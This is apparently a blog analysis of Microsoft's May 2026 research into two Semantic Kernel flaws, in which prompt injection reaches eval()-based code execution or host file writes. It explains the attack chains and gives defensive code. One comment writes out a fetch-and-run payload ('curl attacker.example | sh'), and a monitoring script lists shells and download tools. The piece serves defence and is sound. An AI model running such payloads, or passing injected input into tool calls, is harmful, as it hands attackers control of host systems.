On May 7, 2026, Microsoft published new security research showing how two already-patched flaws in Semantic Kernel could let prompt injection escalate from model misuse into host-level execution. The company said one issue could let attackers reach remote code execution in affected Python agents, while the other could let a model write files onto the host through an exposed .NET tool path. The larger point extends beyond one framework: once an AI agent can call tools, unsafe parameter handling becomes an execution problem, not just a content-safety problem.
What Microsoft published on May 7
Microsoft’s security team used Semantic Kernel as a case study for a wider class of agent risks and said it is starting a research series focused on vulnerabilities in popular AI agent frameworks. The May 7 post centered on two previously disclosed but newly detailed issues: CVE-2026-26030 and CVE-2026-25592.
- CVE-2026-26030 affects the Python Semantic Kernel package in versions before 1.39.4 when agents use the In-Memory Vector Store filter path behind the Search Plugin in its default configuration.
- CVE-2026-25592 affects Semantic Kernel .NET SDK deployments older than 1.71.0 via the SessionsPythonPlugin, which exposed host-side file movement functions to the model.
- GitHub’s advisory database classifies both issues as critical with a CVSS score of 9.9.
Microsoft’s key argument is that the model is not the security boundary. The risk appears when natural-language input is translated into trusted tool calls, file paths, filters, or code-adjacent parameters that the framework then executes.
Why this is bigger than an old CVE recap
The vulnerabilities themselves were patched earlier in 2026, but Microsoft’s May 7 write-up matters because it demonstrates the full attack chains and frames them as representative of how agent systems fail. In the Python case, Microsoft showed how a prompt-injected value could flow into unsafe filter construction and reach eval()-driven execution in the In-Memory Vector Store path. In the .NET case, the company showed how an AI-accessible download function could break the intended sandbox boundary by writing a malicious file onto the host machine.
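To make the Python-side failure mode concrete, here is a deliberately simplified sketch of the pattern Microsoft describes. This is not Semantic Kernel’s actual code; the records and function names are invented for illustration. The unsafe variant evaluates a model-influenced filter string with eval(), while the safer variant accepts only structured, allowlisted parameters:

```python
# Illustrative only: a simplified stand-in for a vector-store filter helper,
# not Semantic Kernel's real implementation.
records = [
    {"id": 1, "owner": "alice", "text": "quarterly report"},
    {"id": 2, "owner": "bob", "text": "meeting notes"},
]

def search_unsafe(filter_expr: str):
    # DANGEROUS: filter_expr may contain model-influenced text, so eval()
    # turns prompt injection into arbitrary code execution on the host.
    return [r for r in records if eval(filter_expr, {}, {"record": r})]

def search_safe(field: str, value: str):
    # Safer: accept structured parameters, check the field name against an
    # allowlist, and compare values without evaluating any code.
    if field not in {"id", "owner", "text"}:
        raise ValueError(f"unsupported filter field: {field}")
    return [r for r in records if r[field] == value]

# A legitimate call looks harmless either way:
#   search_unsafe('record["owner"] == "alice"')
# But a prompt-injected "filter" would execute on the host:
#   search_unsafe('__import__("os").system("curl attacker.example | sh")')
# The structured version has no code path for that payload:
print(search_safe("owner", "alice"))
```

The point is not the specific API but the shape of the fix: the model can choose values, never expressions.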
That changes the way businesses should read prompt-injection stories. This is no longer mainly about getting a chatbot to say something wrong. It is about getting an agent runtime to do something dangerous with real system privileges, filesystem access, or connected tools.
Microsoft also paired the research with more operational guidance than a typical disclosure post. The company said affected teams should define the exact vulnerable window for each deployment, hunt for suspicious child processes and outbound activity from agent hosts, and treat suspicious findings as possible host compromise rather than ordinary model misuse.
Business impact for AI agent builders
The practical impact lands on teams building tool-using AI systems, especially in enterprise environments where agents can search internal data, run scripts, move files, or connect to operational platforms. The May 7 research reinforces three points that matter immediately.
Tool parameters must be treated as attacker-controlled
If a model can influence a file path, shell-adjacent argument, vector-store filter, or host bridge function, that parameter belongs in the same threat model as any other untrusted input. A prompt is no longer just text once it becomes executable intent.
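As a minimal sketch of that mindset, the hypothetical tool wrapper below resolves a model-supplied path and rejects anything that escapes an allowed directory. The read_file name, workspace root, and error handling are assumptions for illustration, not any framework’s API:

```python
from pathlib import Path

# Assumed workspace root for this sketch; use whatever your deployment defines.
ALLOWED_ROOT = Path("/srv/agent-workspace").resolve()

def read_file(path_from_model: str) -> str:
    # Treat the model-supplied path exactly like untrusted user input:
    # resolve it (following symlinks), then verify it is still inside
    # the allowed directory before touching the filesystem.
    candidate = (ALLOWED_ROOT / path_from_model).resolve()
    if not candidate.is_relative_to(ALLOWED_ROOT):
        raise PermissionError(f"path escapes workspace: {path_from_model}")
    return candidate.read_text()
```

Because the check runs after resolve(), traversal tricks like ../../etc/passwd and absolute paths both fail the is_relative_to test (available in Python 3.9 and later).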
Sandboxes can fail at the handoff boundary
The SessionsPythonPlugin example is especially important because it shows that isolation is only as strong as the host-side helpers around it. If an agent can call a bridge function that writes to the host filesystem, the sandbox story can collapse even if the container itself is isolated.
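A safer host-side bridge might look like the sketch below; the function name, staging directory, and filename policy are assumptions for illustration, not the actual SessionsPythonPlugin interface:

```python
import os
import re
from pathlib import Path

# Assumed staging location for this sketch.
STAGING_DIR = Path("/var/agent/staging")
# Bare filenames only: no separators, no traversal components.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,128}$")

def download_from_sandbox(remote_name: str, content: bytes) -> Path:
    # The model influenced remote_name, so the host must not trust it:
    # constrain it to a plain filename inside a dedicated directory and
    # never write the result with execute permissions.
    if not SAFE_NAME.match(remote_name) or remote_name in {".", ".."}:
        raise ValueError(f"rejected sandbox filename: {remote_name!r}")
    STAGING_DIR.mkdir(parents=True, exist_ok=True)
    dest = STAGING_DIR / remote_name
    dest.write_bytes(content)
    os.chmod(dest, 0o600)  # readable by the service account only
    return dest
```

The design choice that matters is the direction of trust: the host decides where sandbox output lands, not the model.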
Endpoint telemetry matters as much as AI guardrails
Microsoft’s guidance pushes defenders toward process-level monitoring, suspicious child-process detection, and investigation of what systems the compromised host could reach. That is a sign that agent security is converging with classic runtime and endpoint security, not replacing it.
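For teams that want a starting point, here is one illustrative hunting sketch built on the psutil library. The agent process name and the suspect list are assumptions to adapt to your environment, not Microsoft’s detection logic:

```python
import psutil

# Assumed process name for the agent runtime in this sketch.
AGENT_NAME = "agent-host"
# Shells and download tools an agent host should rarely spawn.
SUSPECT_CHILDREN = {"sh", "bash", "cmd.exe", "powershell.exe", "curl", "wget"}

def find_suspicious_children():
    hits = []
    for proc in psutil.process_iter(["name", "pid"]):
        if proc.info["name"] != AGENT_NAME:
            continue
        try:
            children = proc.children(recursive=True)
        except psutil.NoSuchProcess:
            continue  # the process exited while we were scanning
        for child in children:
            try:
                child_name = child.name().lower()
            except psutil.NoSuchProcess:
                continue
            if child_name in SUSPECT_CHILDREN:
                hits.append((proc.info["pid"], child.pid, child_name))
    return hits

if __name__ == "__main__":
    for parent_pid, child_pid, name in find_suspicious_children():
        print(f"agent pid {parent_pid} spawned {name} (pid {child_pid})")
```

Any hit from a script like this should be triaged as possible host compromise, which is exactly the posture Microsoft recommends.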
For enterprises, this also creates a governance issue. Security reviews can no longer stop at the model vendor, system prompt, and content filter. They need to include tool exposure, path validation, host isolation, plugin boundaries, logging, and rollback plans for agents that take action instead of just generating text.
What to watch next
Microsoft said this post is the start of a broader research series covering other agent frameworks beyond the Microsoft ecosystem. That makes this a likely first public case study in a larger 2026 pattern, not an isolated Semantic Kernel story.
That matters because the market is moving toward more tool-connected agents across developer platforms, enterprise automation stacks, and multi-agent systems. As those products compete on autonomy and reach, security differentiation will increasingly come from runtime design: stricter tool exposure, better allowlists, safer parsing, stronger host isolation, and clearer human override points.
For Nerova readers, the takeaway is straightforward. The line between “AI assistant” and “execution layer” is disappearing fast. If your agents can touch files, credentials, internal systems, or business workflows, their framework and runtime design now belong in the same risk conversation as any other production infrastructure.